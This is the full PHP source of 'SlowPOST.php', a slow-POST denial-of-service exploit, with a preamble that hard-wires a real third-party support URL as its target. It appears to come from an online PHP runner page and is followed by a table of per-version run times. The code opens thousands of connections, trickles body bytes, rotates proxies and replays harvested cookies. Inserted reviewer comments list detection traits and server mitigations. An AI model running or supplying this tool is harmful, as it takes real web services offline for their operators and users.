<?php
// Preamble ahead of the script proper: removes the execution time limit, keeps
// the script running after the requesting client disconnects, and overwrites
// argv[1], so the "Fetch the URL to attack" step in the main code takes this
// value instead of prompting on STDIN.
set_time_limit(0);
ignore_user_abort(true);
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
?><?php
/**
 * Exploit Title: SlowPOST.php - POST Denial-Of-Service [v1.9.2]
 *
 * Date: 13.05.2013
 * Author: NewEraCracker
 * License: Public Domain
 *
 * How to run using php command line:
 * Linux : php-cli SlowPOST.php
 * Windows : php SlowPOST.php
 *
 * This exploit might expose your IP Address in server logs. Be aware.
 */

/*
 * Reviewer notes (defensive reading of this listing)
 *
 * Technique: every connection sends a complete POST header block declaring a
 * Content-Length between 1337 and 133700 (slowPostStart), after which the body
 * is delivered at most 5 random bytes per pass of the main loop
 * (slowPostContinue). A server that waits for the declared body keeps the
 * connection open for as long as the client keeps trickling; on servers that
 * dedicate a worker to each connection this exhausts the worker pool.
 *
 * Traffic traits visible in the code, usable as detection signals:
 *   - the Accept header value itself starts with "Accept: " (the header line
 *     reads "Accept: Accept: text/html,...");
 *   - a "Keep-Alive" request header carrying a bare integer from 60 to 120;
 *   - User-Agent drawn from a small fixed set: MSIE 7.0 to 10.0 or
 *     Firefox 17.0 to 21.0, always on Windows NT 5.0 to 6.2;
 *   - Content-Type "application/x-www-form-urlencoded; charset=UTF-8" with a
 *     body of random printable characters rather than key=value pairs;
 *   - many concurrent POSTs to one path whose bodies never complete quickly.
 * When a proxy list is used the connections arrive through the listed
 * proxies, so correlate on these header traits, not on source address alone.
 *
 * Mitigation: enforce a request-body read timeout or minimum data rate (for
 * example Apache mod_reqtimeout's RequestReadTimeout, nginx
 * client_body_timeout), cap concurrent connections per client (for example
 * nginx limit_conn), and front worker-per-connection servers with a reverse
 * proxy that buffers request bodies. Cookie gating by itself does not filter
 * this client: it first fetches Set-Cookie values with a GET and replays them.
 */

//-------------------------
// CONFiG
//-------------------------
// Number of cookie strings NewEraCookies collects before the main loop starts.
$CONFIG['max_cookies'] = 20;
// Number of connection slots the main loop cycles through.
$CONFIG['max_sockets'] = 9001;
// Passed as the third argument of stream_set_timeout() in openCustomSocket().
$CONFIG['timeout_ms'] = 500;
// Passed to usleep() before each body fragment in slowPostContinue().
$CONFIG['usleep_time'] = 10;

//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if(!defined('EXPLOIT_VERSION'))
    define('EXPLOIT_VERSION', 'v1.9.2');

// Define STDIN (only when the running SAPI has not defined it already)
if(!defined('STDIN'))
    define('STDIN', fopen('php://stdin', 'r'));

// Check PHP Version
if(version_compare(PHP_VERSION, '5.0.4') < 0)
{
    echo 'This support only supports PHP 5.0.4 and higher.';
    exit(1);
}

// Globals - DO NOT EDIT
// Filled by proxyLoadFile(); each entry is array('host' => string, 'port' => int).
$global_proxy_array = array();

//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------

/**
 * Read one line from STDIN and return it with surrounding whitespace trimmed.
 *
 * @return string|false false when the STDIN handle is falsy
 */
function readSTDIN()
{
    $file = STDIN;
    if(!$file)
        return false;
    return trim(fgets($file));
}

/**
 * Load a "host:port"-per-line proxy list file into $global_proxy_array.
 *
 * Prints a message and exits with status 1 when the file name is empty or the
 * file cannot be read or is empty. Lines without a ':' are skipped.
 *
 * @param string $filename path of the proxy list; backslashes are converted to '/'
 */
function proxyLoadFile($filename)
{
    global $global_proxy_array;

    // Load proxy list file
    $filename = str_replace('\\', '/', $filename);
    $content = @file_get_contents($filename);
    if(!$filename || !$content)
    {
        // The message literal is kept exactly as on the page, including the
        // line break inside it.
        echo $filename.' 
is not a valid proxy-list file!';
        exit(1);
    }

    // Normalise CRLF / CR line endings to LF, then split into lines
    $content = str_replace(array("\r\n", "\r"), "\n", $content);
    $content = explode("\n", $content);

    // Grab the proxies
    foreach($content as $value)
    {
        $tmp = explode(':', $value);
        if(isset($tmp[0], $tmp[1]))
        {
            $tmp[0] = trim($tmp[0]);
            $tmp[1] = (int)(trim($tmp[1]));
            // The proxy
            $global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]);
        }
    }
}

/**
 * Return one randomly chosen entry of $global_proxy_array.
 *
 * @return array|false array('host' => ..., 'port' => ...), or false when the list is empty
 */
function proxyGetRandom()
{
    global $global_proxy_array;

    // Give a random proxy
    if(count($global_proxy_array))
    {
        $proxy = null;
        // Retries until the randomly picked index holds an entry
        while(!$proxy)
        {
            $rand = mt_rand(0, count($global_proxy_array) - 1);
            $proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
        }
        return $proxy;
    }
    return false;
}

/**
 * Build a User-Agent string from a small fixed set of values.
 *
 * Picks a Windows NT version (5.0 to 6.2), then either an Internet Explorer
 * (MSIE 7.0 to 10.0) or a Firefox (17.0 to 21.0) template. The set is closed,
 * which makes the resulting strings usable as a detection signal.
 *
 * @return string
 */
function randomUserAgent()
{
    // Microsoft Windows versions
    $os = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
    // Select a random version
    $os = $os[mt_rand(0, count($os) - 1)];

    // Select a random browser
    if(mt_rand(0, 1))
    {
        // Internet Explorer versions: array(Mozilla version, MSIE version, Trident version)
        $ua[0] = array('4.0', '7.0', '4.0');
        $ua[1] = array('4.0', '8.0', '4.0');
        $ua[2] = array('5.0', '9.0', '5.0');
        $ua[3] = array('5.0', '10.0', '6.0');
        // Random IE
        $ua = $ua[mt_rand(0, count($ua) - 1)];
        return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})";
    }
    else
    {
        // Mozilla Firefox versions
        $ua = array('17.0', '18.0', '19.0', '20.0', '21.0');
        // Random FF
        $ua = $ua[mt_rand(0, count($ua) - 1)];
        return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}) Gecko/20100101 Firefox/{$ua}";
    }
}

/**
 * Open a non-blocking stream socket to the proxy if one is given, else to the URL's host.
 *
 * @param NewEraUrl        $newEraUrl   connection endpoint when no proxy is used
 * @param NewEraProxy|null $newEraProxy connection endpoint when set
 * @return resource|false  the socket, or false when fsockopen() fails
 */
function openCustomSocket($newEraUrl, $newEraProxy = null)
{
    global $CONFIG;

    @ini_set('default_socket_timeout', 1);

    // Both classes expose ->ssl, ->name and ->port through __get()
    $newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
    $host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
    $fp = @fsockopen($host, $newEraConnection->port);
    if(!$fp)
        return false;

    // Non-blocking mode: later fwrite() calls return without waiting on the peer
    stream_set_blocking($fp, 0);
    stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
    return $fp;
}

/**
 * Receives a socket and performs the start of a slowPosting
 * Returns Content-Length on success and false on failure
 *
 * Writes the request line and all headers, ending with the blank line, so the
 * server sees a complete header block that announces a body of $length bytes.
 * No body bytes are sent here. The request target is the full URL when a
 * proxy is in use and the path otherwise.
 *
 * @param resource         $sock        socket from openCustomSocket()
 * @param NewEraUrl        $newEraUrl
 * @param NewEraProxy|null $newEraProxy
 * @param string|false     $cookie      value for the Cookie header; omitted when empty
 * @return int|false the announced Content-Length, or false when $sock is falsy
 */
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie)
{
    // Check the socket
    if(!$sock)
        return false;

    // Generate a random Content-Length
    $length = mt_rand(1337, 133700);

    // Build
    $header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
    $header .= 'Host: '.$newEraUrl->name."\r\n";
    $header .= 'Connection: Keep-Alive'."\r\n";
    // The header value below begins with a second "Accept: "; that doubled
    // prefix is a stable trait of this tool's requests.
    $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
    $header .= 'User-Agent: '.randomUserAgent()."\r\n";
    $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
    $header .= 'Accept-Encoding: gzip,deflate'."\r\n";
    $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
    $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
    // Referer (the URL itself) is included on roughly half of the requests
    $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
    $header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
    $header .= 'Content-Length: '.$length."\r\n";
    $header .= "\r\n";

    // Do it (the fwrite() result is not checked)
    @fwrite($sock, $header);
    return $length;
}

/**
 * Receives a socket and continues the slowPosting
 *
 * Writes $bytes random printable ASCII characters (codes 33 to 126), passed
 * through urlencode(), to the socket. urlencode() can expand a character to
 * three bytes, so more than $bytes bytes may go out per call.
 *
 * @param resource $sock
 * @param int      $bytes number of characters to generate; reset to 5 when not integer-valued
 * @return bool false when $sock is falsy, true otherwise
 */
function slowPostContinue($sock, $bytes = 5)
{
    global $CONFIG;

    // Check the socket
    if(!$sock)
        return false;

    // Check the $bytes
    if(intval($bytes) != $bytes)
        $bytes = 5;

    // Throttle execution speed slightly
    if($CONFIG['usleep_time'] > 0)
        @usleep($CONFIG['usleep_time']);

    // Build the fragment and write it (the fwrite() result is not checked)
    $tmp = '';
    for($j = 0; $j < $bytes; $j++)
        $tmp .= chr(mt_rand(33, 126));
    @fwrite($sock, urlencode($tmp));
    return true;
}

//-------------------------
// CLASSES FOR THE LULZ
//-------------------------

/**
 * I want cookies! Give me cookies!
 *
 * Collects up to $max_cookies Cookie header strings by sending GET requests to
 * the URL and reading the Set-Cookie response headers. The strings are later
 * replayed on the POST requests, so a site that only checks for the presence
 * of a previously issued cookie does not tell these requests apart.
 */
class NewEraCookies
{
    // Number of cookie strings to collect
    private $max_cookies;
    // Collected Cookie header values, indexed 0 .. max_cookies - 1
    private $cookies = array();

    /** Constructor: delegates to update_object() */
    public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false)
    {
        $this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
    }

    /**
     * Object updater: discards stored cookies and fetches $max_cookies new ones.
     *
     * @param NewEraUrl        $newEraUrl
     * @param NewEraProxy|null $newEraProxy re-pointed at a random proxy per fetch when $proxyFile is truthy
     * @param int              $max_cookies
     * @param mixed            $proxyFile   truthy when a proxy list is in use; also used in the exit message
     * @param bool             $output      print a progress dot per fetch
     */
    public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false)
    {
        $this->max_cookies = $max_cookies;
        $this->cookies = array();

        if($output)
            echo PHP_EOL.'BUILDING COOKIES ';

        for($i = 0; $i < $this->max_cookies; $i++)
        {
            // Using Proxy file?
            if($proxyFile)
            {
                $newproxy = proxyGetRandom();
                if(!$newproxy)
                    exit($proxyFile.' is not a valid proxy-list file!');
                $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
            }
            $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
            if($output)
                echo '.';
        }
    }

    /**
     * Returns a cookie by its index
     *
     * @param int|string $idx index, or 'random' for a random slot
     * @return string|false the stored value, or '' when the slot is unset
     */
    public function returnCookieByIndex($idx)
    {
        // NOTE(review): loose comparison; on PHP versions before 8 an integer 0
        // also compares equal to 'random' - confirm against the PHP version in use
        if($idx == 'random')
            $idx = mt_rand(0, $this->max_cookies - 1);
        if(isset($this->cookies[$idx]))
            return $this->cookies[$idx];
        return '';
    }

    /**
     * Function to parse set-cookie from header fields
     *
     * For every line starting with "Set-Cookie: " (case-insensitive) the first
     * ';'-separated segment is stored as ['value']['key'] / ['value']['value'];
     * of the remaining segments only domain, expires, path, secure and comment
     * are kept ('expires' converted with strtotime(), 'secure' set to 'true').
     *
     * @param array $header response header lines
     * @return array one entry per Set-Cookie line
     */
    public static function cookieParse($header)
    {
        $cookies = array();
        foreach($header as $line)
        {
            if(preg_match('/^Set-Cookie: /i', $line))
            {
                $line = preg_replace('/^Set-Cookie: /i', '', trim($line));
                $csplit = explode(';', $line);
                $cdata = array();
                $grabbed_cookie_data = false;
                foreach($csplit as $data)
                {
                    $cinfo = explode('=', $data);
                    $cinfo[0] = trim($cinfo[0]);
                    // First segment is the cookie's own name=value pair
                    if(!$grabbed_cookie_data)
                    {
                        $cdata['value']['key'] = $cinfo[0];
                        $cdata['value']['value'] = $cinfo[1];
                        $grabbed_cookie_data = true;
                        continue;
                    }
                    // Remaining segments are attributes
                    $cinfo[0] = strtolower($cinfo[0]);
                    if($cinfo[0] == 'expires')
                        $cinfo[1] = @strtotime($cinfo[1]);
                    if($cinfo[0] == 'secure')
                        $cinfo[1] = 'true';
                    if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment')))
                    {
                        $cdata[$cinfo[0]] = $cinfo[1];
                    }
                }
                $cookies[] = $cdata;
            }
        }
        return $cookies;
    }

    /**
     * Function to build the request cookie header from parsed set-cookie data
     *
     * @param array $data output of cookieParse()
     * @return string|false "k1=v1; k2=v2" form, or false when $data is not an array or is empty
     */
    public static function cookieBuild($data)
    {
        if(is_array($data))
        {
            $cookie = array();
            foreach($data as $d)
                $cookie[] = $d['value']['key'].'='.$d['value']['value'];
            if(count($cookie) > 0)
                return trim(implode('; ', $cookie));
        }
        return false;
    }

    /**
     * Function to grab cookies from an url using PHP's fopen
     *
     * Sends one GET with the same browser-like headers as the POSTs (3 second
     * timeout, no redirects followed, error responses kept) and turns the
     * Set-Cookie response headers into a Cookie header value.
     *
     * @param NewEraUrl        $newEraUrl
     * @param NewEraProxy|null $newEraProxy
     * @return string|false '' when the request could not be opened; otherwise the cookieBuild() result
     */
    public static function cookieGrab($newEraUrl, $newEraProxy = null)
    {
        // Build connection header
        $header = 'Host: '.$newEraUrl->name."\r\n";
        $header .= 'Connection: Keep-Alive'."\r\n";
        $header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
        $header .= 'User-Agent: '.randomUserAgent()."\r\n";
        $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
        $header .= 'Accept-Encoding: gzip,deflate'."\r\n";
        $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";

        // Check proxy url
        if($newEraProxy)
        {
            // Enable proxy
            $proxy_url = $newEraProxy->full_url;
            $request_fulluri = true;
        }
        else
        {
            // Disable proxy
            $proxy_url = '';
            $request_fulluri = false;
        }

        // Build stream context
        // 'verify_peer' => false turns off TLS certificate verification for this GET
        $context = stream_context_create(array(
            'http' => array(
                'method' => 'GET',
                'timeout' => (3),
                'header' => $header,
                'proxy' => $proxy_url,
                'request_fulluri' => $request_fulluri,
                'max_redirects' => (0),
                'protocol_version' => (1.1),
                'ignore_errors' => true
            ),
            'ssl' => array(
                'verify_peer' => false
            )
        ));

        // Let the fun begin
        $cookie = '';
        $handle = @fopen($newEraUrl->full_url, 'r', false, $context);

        // I hope this does work
        if($handle)
        {
            // If it worked, we grab the cookies
            // (the http wrapper exposes the response header lines as 'wrapper_data')
            $metadata = stream_get_meta_data($handle);
            $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
            // Fun is only at a small distance
            @fclose($handle);
        }
        return $cookie;
    }
}

/**
 * Class to construct and handle an url-like object
 *
 * Properties are private and read through __get() without the "host_" prefix:
 * full_url, protocol, ssl, name, port, path.
 */
class NewEraUrl
{
    private $host_full_url;
    private $host_protocol;
    private $host_ssl;
    private $host_name;
    private $host_port;
    private $host_path;

    /** Constructor: delegates to update_object() */
    public function __construct($host_full_url)
    {
        $this->update_object($host_full_url);
    }

    /**
     * Object updater: splits the URL by plain string operations.
     *
     * No validation happens here; callers check the value with isValid() first.
     *
     * @param string $host_full_url "http://host[:port][/path]" or the https form
     */
    public function update_object($host_full_url)
    {
        $this->host_full_url = $host_full_url;
        $this->host_ssl = ((strpos($this->host_full_url, 'https') === 0) ? true : false);
        $this->host_protocol = ($this->host_ssl ? 'https' : 'http');

        // Grab other parameters
        // After the split: [0] = "scheme:", [1] = "", [2] = "host[:port]", [3] = rest of the URL
        $host_full_url = explode('/', $host_full_url, 4);
        $host_full_url[2] = explode(':', $host_full_url[2], 2);

        // Host, Port, Path
        $this->host_name = $host_full_url[2][0];
        $this->host_port = (isset($host_full_url[2][1]) ? $host_full_url[2][1] : ($this->host_ssl ? 443 : 80));
        $this->host_path = '/'.(isset($host_full_url[3]) ? $host_full_url[3] : '');
    }

    /**
     * Getter for the private properties
     *
     * Falls through without a return statement (yielding null) when the
     * prefixed property is not set.
     */
    public function __get($var)
    {
        $var = 'host_'.$var;
        if(isset($this->{$var}))
            return $this->{$var};
    }

    /**
     * Quick check to see if url is minimally valid
     *
     * Only tests for a leading "https://" or "http://".
     *
     * @return true|null true on a match; no explicit return otherwise
     */
    public static function isValid($host_full_url)
    {
        if(strpos($host_full_url, 'https://') === 0 || strpos($host_full_url, 'http://') === 0)
            return true;
    }
}

/**
 * Class to construct and handle a proxy-like object
 *
 * Properties are private and read through __get() without the "proxy_" prefix:
 * full_url, protocol, ssl, name, port.
 */
class NewEraProxy
{
    private $proxy_full_url;
    private $proxy_protocol;
    private $proxy_ssl;
    private $proxy_name;
    private $proxy_port;

    /** Constructor: delegates to update_object() */
    public function __construct($proxy_full_url)
    {
        $this->update_object($proxy_full_url);
    }

    /**
     * Object updater
     *
     * @param string $proxy_full_url "tcp://host:port" or "ssl://host:port"
     */
    public function update_object($proxy_full_url)
    {
        $this->proxy_full_url = $proxy_full_url;
        $this->proxy_ssl = ((strpos($this->proxy_full_url, 'ssl') === 0) ? true : false);
        $this->proxy_protocol = ($this->proxy_ssl ? 'ssl' : 'tcp');

        // Grab other parameters: drop the "scheme://" prefix when present
        if(false !== ($tmp = strpos($proxy_full_url, '://')))
            $proxy_full_url = substr($proxy_full_url, $tmp + 3);
        $proxy_full_url = explode(':', $proxy_full_url);

        // Host, Port
        $this->proxy_name = $proxy_full_url[0];
        $this->proxy_port = (int)(isset($proxy_full_url[1]) ? $proxy_full_url[1] : ($this->proxy_ssl ? '443' : '80'));
    }

    /**
     * Getter for the private properties
     *
     * Falls through without a return statement (yielding null) when the
     * prefixed property is not set.
     */
    public function __get($var)
    {
        $var = 'proxy_'.$var;
        if(isset($this->{$var}))
            return $this->{$var};
    }
}

//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------

// Banner; the literal is reproduced exactly as it appears on the page
echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| ";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;

// Fetch the URL to attack
// (argv[1] was overwritten by the preamble at the top of this listing)
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
    $url = $_SERVER['argv'][1];

// Fetch proxy to use
// argv[2] is read either as "host:port" or, failing that, as a readable proxy-list file
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2]))
{
    // This assignment replaces the whole $proxy array initialised above
    if($proxy = explode(':', $_SERVER['argv'][2]))
    {
        if(isset($proxy[0], $proxy[1]))
        {
            $proxy['file'] = false;
            $proxy['host'] = $proxy[0];
            $proxy['port'] = (int)($proxy[1]);
            unset($proxy[0], $proxy[1]);
        }
    }
    if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2]))
    {
        $proxy['file'] = true;
        $proxy['filename'] = $_SERVER['argv'][2];
    }
}

// Ask for proxy (interactive path, only when no URL came from argv)
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file'])
{
    $proxy['use'] = null;
    while(!$proxy['use'])
    {
        echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
        $proxy['use'] = readSTDIN();
        // Only the first letter of the answer is examined
        if(strpos(strtolower($proxy['use']), 'n') === 0)
        {
            break;
        }
        elseif(strpos(strtolower($proxy['use']), 'y') === 0)
        {
            echo PHP_EOL.'Proxy IP: ';
            $proxy['host'] = readSTDIN();
            echo PHP_EOL.'Proxy Port: ';
            $proxy['port'] = (int)(readSTDIN());
        }
        elseif(strpos(strtolower($proxy['use']), 'f') === 0)
        {
            echo PHP_EOL.'Proxy file: ';
            $proxy['filename'] = readSTDIN();
            if(is_readable($proxy['filename']))
            {
                $proxy['file'] = true;
            }
            else
            {
                // Literal kept exactly as on the page, including its line break
                echo PHP_EOL.'Invalid 
file!'.PHP_EOL;
                $proxy['use'] = null;
            }
        }
        else
        {
            $proxy['use'] = null;
            echo PHP_EOL.'Invalid choice!'.PHP_EOL;
        }
    }
    unset($proxy['use']);
}

// Ask for target URL (loops until isValid() accepts the input)
while(!$url)
{
    echo PHP_EOL.'Target url: ';
    $url = readSTDIN();
    if(NewEraUrl::isValid($url))
        break;
    $url = null;
    echo PHP_EOL.'Invalid target!'.PHP_EOL;
}

// Init proxy support
if(empty($proxy['host']) || empty($proxy['port']))
{
    $newEraProxy = null;
    if(!empty($proxy['file']))
    {
        proxyLoadFile($proxy['filename']);
        $newproxy = proxyGetRandom();
        if(!$newproxy)
            exit($proxy['filename'].' is not a valid proxy-list file!');
        $newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
    }
}
else
{
    $newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}

// Init the others
// Constructing NewEraCookies performs the $CONFIG['max_cookies'] GET requests
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);

// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
// Tracked connections: slot index => array('sock' => resource, 'length' => body bytes still owed)
$fp = array();

// Main loop, never exits on its own. Each pass of the inner for loop tries to
// open one new connection for slot $i and then advances every tracked
// connection by at most 5 body characters.
while(1)
{
    for($i = 0; $i < $CONFIG['max_sockets']; $i++)
    {
        // Using Proxy file?
        if($proxy['file'])
        {
            $newproxy = proxyGetRandom();
            if(!$newproxy)
                exit($proxy['filename'].' is not a valid proxy-list file!');
            $newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
        }

        // Open a new socket
        $tmp = array();
        if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy))
        {
            // Progress bar
            echo '.';

            // Start a new slowPost and find its length
            if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random')))
            {
                if(isset($fp[$i], $fp[$i]['sock']))
                {
                    // Close connection in the global socket array if it is being used
                    @fclose($fp[$i]['sock']);
                    unset($fp[$i]);
                }
                // Save the new socket in the global socket array
                $fp[$i] = $tmp;
            }
            else
            {
                // Epic fail?
                @fclose($tmp['sock']);
            }
        }
        unset($tmp);

        // Check the current sockets
        foreach($fp as $k => $v)
        {
            if($fp[$k]['length'] > 0)
            {
                // Continue old slowPosts: at most 5 characters, fewer when less remains
                $tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
                slowPostContinue($fp[$k]['sock'], $tmp);
                $fp[$k]['length'] -= $tmp;
            }
            else
            {
                // Close completed slowPosts
                @fclose($fp[$k]['sock']);
                unset($fp[$k]);
            }
        }
    }
}
?>

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.3.41.1590.84319.29
8.3.31.1200.88420.77
8.3.21.2200.78320.71
8.3.11.1190.88222.47
8.3.01.2200.78322.83
8.2.171.1670.83722.96
8.2.161.2620.73922.39
8.2.151.1600.84324.18
8.2.141.2960.70624.66
8.2.131.2330.77026.16
8.2.121.2660.73621.07
8.2.111.1590.84219.61
8.2.101.0260.97618.28
8.2.90.5961.40619.58
8.2.80.6521.34818.53
8.2.70.6401.36318.13
8.2.60.6031.39818.05
8.2.50.6981.30118.13
8.2.40.7061.30520.01
8.2.30.6541.35019.83
8.2.20.6331.36918.27
8.2.10.6161.38518.30
8.2.00.6431.35918.25
8.1.271.2450.75623.99
8.1.261.1600.84326.35
8.1.251.3390.66328.09
8.1.241.1120.88922.70
8.1.231.0350.96521.26
8.1.220.7031.29918.77
8.1.210.7631.23919.47
8.1.200.6461.35717.73
8.1.190.6201.38417.91
8.1.180.6331.37018.10
8.1.170.6531.34919.09
8.1.160.6831.31819.45
8.1.150.7011.30619.21
8.1.140.6801.32318.03
8.1.130.7461.25518.34
8.1.120.6131.38917.88
8.1.110.6871.31718.03
8.1.100.6131.38917.80
8.1.90.6271.37717.80
8.1.80.6531.35018.05
8.1.70.6991.30217.94
8.1.60.5761.42618.02
8.1.50.5761.42617.95
8.1.40.6201.38317.86
8.1.30.6161.38618.02
8.1.20.6391.36118.13
8.1.10.5731.42818.01
8.1.00.6401.36317.96
8.0.300.6981.30920.45
8.0.290.6461.35617.54
8.0.280.6521.35718.80
8.0.270.6461.35517.76
8.0.260.6901.31317.21
8.0.250.6921.30817.48
8.0.240.6961.30617.33
8.0.230.6791.32217.38
8.0.220.6291.37217.32
8.0.210.5871.41617.36
8.0.200.6631.34017.50
8.0.190.6501.35217.40
8.0.180.6091.39217.37
8.0.170.6631.33917.30
8.0.160.5491.45217.47
8.0.150.6001.40317.32
8.0.140.6121.38617.25
8.0.130.5461.45613.92
8.0.121.4450.47617.39
8.0.111.4400.50517.38
8.0.101.4700.48917.39
8.0.91.5100.44617.33
8.0.81.2870.55817.39
8.0.71.4740.49517.21
8.0.61.5140.45517.28
8.0.51.4710.47617.34
8.0.31.4910.45717.50
8.0.21.5030.46217.46
8.0.11.5230.42417.39
8.0.01.5010.46717.29
7.4.330.6161.38615.00
7.4.320.5631.43816.82
7.4.300.5901.41216.79
7.4.290.6201.38316.75
7.4.280.5231.47916.89
7.4.270.5561.44516.87
7.4.260.5361.46413.77
7.4.251.4910.43616.87
7.4.241.4880.45816.89
7.4.231.4320.52416.93
7.4.221.3160.63516.91
7.4.211.3340.60616.88
7.4.201.4820.45016.77
7.4.191.4970.45917.06
7.4.161.5010.45517.05
7.4.151.4670.48117.40
7.4.141.4720.48817.86
7.4.131.4690.50316.97
7.4.121.4770.49216.97
7.4.111.5350.53316.93
7.4.101.5240.51216.86
7.4.91.5060.57116.94
7.4.81.3970.51419.39
7.4.71.3540.62917.04
7.4.61.4760.51617.00
7.4.51.4910.43216.69
7.4.41.4360.59422.77
7.4.31.0600.43117.10
7.3.330.5601.44213.94
7.3.320.5821.41813.84
7.3.311.4240.49916.86
7.3.301.4910.47816.86
7.3.291.3400.60616.82
7.3.281.3200.54816.87
7.3.271.5040.45617.40
7.3.261.4460.51216.80
7.3.251.4710.48616.86
7.3.241.4850.48216.83
7.3.231.4870.55716.91
7.3.211.3290.48316.93
7.3.201.3790.60219.39
7.3.191.4620.53616.98
7.3.181.3640.64816.80
7.3.171.4170.57716.89
7.3.161.4360.53117.02
7.2.331.6070.45517.27
7.2.321.2960.56417.23
7.2.311.3840.61117.23
7.2.301.4780.53017.10
7.2.291.4650.54516.96
5.4.221.9900.49019.71
5.4.211.9900.49019.87
5.4.201.9700.51319.74
5.4.191.9870.49719.74
5.4.181.9430.54019.88
5.4.171.9670.51719.75
5.4.161.9130.56719.89
5.4.151.9800.50019.73
5.4.141.8630.61717.07
5.4.132.0100.47317.30
5.4.121.9570.52717.22
5.4.112.0230.45317.06
5.4.102.0030.47717.16
5.4.92.0300.45317.19
5.4.81.9800.50317.17
5.4.71.9700.51317.10
5.4.62.0370.44717.14
5.4.52.0230.46017.31
5.4.41.9870.49717.15
5.4.31.9900.49317.16
5.4.21.7700.71017.12
5.4.11.8430.63717.13
5.4.01.9000.58016.69
5.3.272.0270.45715.25
5.3.261.8370.64315.11
5.3.251.9230.55715.25
5.3.241.8800.60015.26
5.3.231.9930.49015.26
5.3.222.0030.48015.22
5.3.212.0000.48315.07
5.3.202.0000.47715.22
5.3.191.9300.55315.03
5.3.182.0470.43714.97
5.3.171.9330.55015.06
5.3.162.0000.48315.15
5.3.151.9770.50715.13
5.3.141.9730.51014.98
5.3.131.8030.67715.19
5.3.121.8130.66715.27
5.3.111.8830.60015.21
5.3.101.8330.64714.54
5.3.91.9470.53314.63
5.3.81.9600.51714.66
5.3.71.9800.49714.58
5.3.61.9870.49714.66
5.3.51.9930.49014.37
5.3.42.0130.46714.52
5.3.32.0030.47714.39
5.3.21.9530.53014.41
5.3.12.0230.46014.16
5.3.01.9770.50714.21
